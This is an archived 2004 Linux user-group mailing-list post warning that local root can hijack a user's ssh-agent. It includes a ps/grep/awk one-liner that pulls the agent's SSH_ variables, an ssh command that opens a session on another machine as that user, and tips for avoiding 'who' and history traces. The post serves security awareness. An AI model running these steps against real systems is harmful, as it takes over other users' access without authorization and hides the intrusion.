[PLUG] root and ssh-agent

Jeff Abrahamson on 24 Apr 2004 13:38:02 -0000

[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

[PLUG] root and ssh-agent

From: Jeff Abrahamson <jeff@purple.com>

To: PLUG <plug@lists.phillylinux.org>

Subject: [PLUG] root and ssh-agent

Date: Sat, 24 Apr 2004 09:35:44 -0400

Mail-followup-to: PLUG <plug@lists.phillylinux.org>

Reply-to: plug@lists.phillylinux.org

Sender: plug-admin@lists.phillylinux.org

User-agent: Mutt/1.5.5.1+cvs20040105i

I have long had a nagging feeling that I trust root more than I like to think. I confirmed today that I trust local root on every machine that my ssh private key gives me access to, even though I have a pass-phrase on my key. Here's how it goes, from the viewpoint of local root: Suppose that I am root on machine-1, and I see that user smith is running ssh-agent. I don't have root on other machines (suppose), but I see (from ps, .history, whatever) that smith often connects to machine-2, where I have no power. I wonder what smith does / has set up on machine-2? So I su to smith and then type $ ps ewx|grep agent|tr ' ' '\n'|grep SSH_|sort -u | awk '{ print "export " $0; } The output is some bash lines that I copy and paste into my shell. (I could have done an eval, at the expense of already diminishing clarity.) This gives me access to smith's existing ssh-agent process. Now I ssh to machine-2. Actually, I don't want to show up in who, so I just run an xterm: I only appear in ps and probably last, /var/log/messages, etc. ssh -X -f machine-2 smith@machine-2 xterm Thanks to smith's ssh-agent, I am not asked for a password. Now I, root@machine-1, have full access to machine-2 as smith. Note a few items: - This is not news nor an exploit, but a known bit about ssh-agent. - Actually doing the above would be highly unethical and may be illegal depending on context. I don't advise doing it, ever. - This argues against using ssh-agent on anything but your own machine where only you have root, or else on networks of machines where root is the same everywhere. - I'm describing this because I don't think this mechanism is well-known among non-sysadmins and non-security people, which means most people. - This could be made more slick and harder to notice, no doubt. For example, my first act on machine-2 might be to spawn a subshell so that when I exit I have minimal impact on ~/.history. Etc. -- Jeff Jeff Abrahamson <http://www.purple.com/jeff/> GPG fingerprint: 1A1A BA95 D082 A558 A276 63C6 16BF 8C4C 0D1D AE4B A cool book of games, highly worth checking out: http://www.amazon.com/exec/obidos/ASIN/1931686963/purple-20
Attachment: signature.asc
Description: Digital signature

Follow-Ups:

Re: [PLUG] root and ssh-agent
From: sean finney <seanius@seanius.net>

Prev by Date: Re: [PLUG] anti-spam

Next by Date: Re: [PLUG] root and ssh-agent

Previous by thread: Re: [PLUG] anti-spam

Next by thread: Re: [PLUG] root and ssh-agent

Index(es):

Date

Thread